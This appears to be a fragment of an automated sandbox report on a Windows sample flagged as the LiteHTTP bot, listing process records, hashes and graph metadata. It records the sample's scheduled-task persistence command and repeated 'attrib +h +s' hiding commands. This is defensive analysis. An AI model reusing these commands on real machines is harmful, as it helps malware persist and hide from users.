                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:26:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0



                                    Target ID:0
                                    Start time:07:22:03
                                    Start date:30/10/2024
                                    Path:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0xf80000
                                    File size:213'832 bytes
                                    MD5 hash:8391D3B5332C4B1164333DDCE388A8C7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003536000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.00000000033B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:11
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"schtasks" /Query /TN "3u8A2xjbBT"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:08:50:51
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:08:50:52
                                    Start date:30/10/2024
                                    Path:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Imagebase:0x7c0000
                                    File size:213'832 bytes
                                    MD5 hash:8391D3B5332C4B1164333DDCE388A8C7
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:16
                                    Start time:08:51:02
                                    Start date:30/10/2024
                                    Path:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0xe50000
                                    File size:213'832 bytes
                                    MD5 hash:8391D3B5332C4B1164333DDCE388A8C7
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.0000000003037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:19
                                    Start time:08:51:22
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:20
                                    Start time:08:51:22
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:22
                                    Start time:08:51:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"schtasks" /Query /TN "3u8A2xjbBT"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:23
                                    Start time:08:51:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:24
                                    Start time:08:51:41
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:25
                                    Start time:08:51:41
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:26
                                    Start time:08:51:53
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"schtasks" /Query /TN "3u8A2xjbBT"
                                    Imagebase:0xb60000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:08:51:53
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:08:51:57
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:08:51:57
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:30
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:08:52:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:08:52:16
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:08:52:17
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:08:52:17
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:08:52:18
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:08:52:18
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:40
                                    Start time:08:52:22
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:41
                                    Start time:08:52:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:42
                                    Start time:08:52:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:43
                                    Start time:08:52:27
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:44
                                    Start time:08:52:27
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:45
                                    Start time:08:52:37
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:46
                                    Start time:08:52:37
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:47
                                    Start time:08:52:47
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:48
                                    Start time:08:52:47
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:49
                                    Start time:08:53:01
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:50
                                    Start time:08:53:01
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:51
                                    Start time:08:53:02
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:52
                                    Start time:08:53:02
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:54
                                    Start time:08:53:10
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:55
                                    Start time:08:53:10
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:56
                                    Start time:08:53:12
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:57
                                    Start time:08:53:12
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:58
                                    Start time:08:53:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:59
                                    Start time:08:53:23
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:60
                                    Start time:08:53:25
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:61
                                    Start time:08:53:25
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:62
                                    Start time:08:53:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\attrib.exe
                                    Wow64 process (32bit):true
                                    Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                                    Imagebase:0x3a0000
                                    File size:19'456 bytes
                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:63
                                    Start time:08:53:38
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:13.5%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 17508 166afe0 17509 166b02d VirtualProtect 17508->17509 17510 166b098 17509->17510

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: mp$~^
                                      • API String ID: 0-1469016468
                                      • Opcode ID: 74f60eef800dbb15fb8558e40a0db20f5a07a184f206ef4761c922a0be0ca01b
                                      • Instruction ID: ec1e333a11e1ffab472b740774dd2270a95ee518e014afd42114a386f29e02da
                                      • Opcode Fuzzy Hash: 74f60eef800dbb15fb8558e40a0db20f5a07a184f206ef4761c922a0be0ca01b
                                      • Instruction Fuzzy Hash: F9D11674E14319DFCB04CFA9D88099DBBFAFF8A310B14A529D41ABB369D73498028F15

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq$Teq
                                      • API String ID: 0-2938103587
                                      • Opcode ID: 0e854965b36afd2870c9e42c5417c392344b1d69b46e20b4ef93f5344b3fe86f
                                      • Instruction ID: 8bb59f4dd45e2e0767e6fdc0b89f931807570a3c041398bed2e3596d542e7e5e
                                      • Opcode Fuzzy Hash: 0e854965b36afd2870c9e42c5417c392344b1d69b46e20b4ef93f5344b3fe86f
